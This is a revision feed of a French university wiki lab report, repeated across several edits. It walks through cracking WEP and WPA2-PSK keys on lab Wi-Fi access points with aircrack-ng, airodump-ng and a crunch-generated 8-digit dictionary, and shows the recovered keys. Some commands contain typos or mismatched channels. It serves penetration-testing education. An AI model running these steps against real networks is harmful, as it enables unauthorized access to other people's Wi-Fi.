On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
'''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xac Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xad Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xae Dico_krakotte13.txt-13.cap&lt;br /&gt;
&lt;br /&gt;
Puis on obtient le mot de passe craqué :&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.5.2&lt;br /&gt;
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)&lt;br /&gt;
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%&lt;br /&gt;
                         KEY FOUND! [ 66601666 ]&lt;br /&gt;
    Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 &lt;br /&gt;
                     18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5&lt;br /&gt;
&lt;br /&gt;
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 &lt;br /&gt;
                     59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 &lt;br /&gt;
                     B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 &lt;br /&gt;
                     18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5&lt;br /&gt;
&lt;br /&gt;
    EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56553</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56553"/>
				<updated>2021-11-29T12:27:19Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
'''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.&lt;br /&gt;
&lt;br /&gt;
On va stocker environ 10000 trames passants par la kracotte dans un fichier &amp;quot;kracotte.txt&amp;quot; avec la commande suivante :&lt;br /&gt;
    airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon&lt;br /&gt;
&lt;br /&gt;
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :&lt;br /&gt;
    crunch 8 8 0123456789 &amp;gt;&amp;gt; Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :&lt;br /&gt;
    split -b 200m Dico_krakotte13.txt&lt;br /&gt;
&lt;br /&gt;
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :&lt;br /&gt;
    aircrack-ng -w xaa Dico_krakotte13.txt-13.cap&lt;br /&gt;
    aircrack-ng -w xab Dico_krakotte13.txt-13.cap&lt;br /&gt;
    ...&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56542</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56542"/>
				<updated>2021-11-29T11:25:59Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
'''1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).&lt;br /&gt;
&lt;br /&gt;
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    44:AD:D9:5F:87:0C  -22        6        0    0   9  54e. WPA2 CCMP   PSK  kracotte13&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56531</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56531"/>
				<updated>2021-11-29T09:18:30Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56530</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56530"/>
				<updated>2021-11-29T09:15:04Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''1. Tests d’intrusion''' ==&lt;br /&gt;
'''1.1 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt-install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56422</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56422"/>
				<updated>2021-11-19T12:39:10Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''5. Tests d’intrusion''' ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
On branche tout d'abord le module USB Wi-Pi sur la machine.&lt;br /&gt;
&lt;br /&gt;
On installe ensuite le paquetage aircrack-ng :&lt;br /&gt;
    apt-install aicrack-ng&lt;br /&gt;
&lt;br /&gt;
On lit les interfaces disponibles grâce à la commande airmon-ng :&lt;br /&gt;
    root@zabeth03:~# airmon-ng&lt;br /&gt;
    PHY	   Interface	        Driver		    Chipset&lt;br /&gt;
    phy2    wlx40a5ef0f68cb	rt2800usb	    Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.&lt;br /&gt;
    root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb&lt;br /&gt;
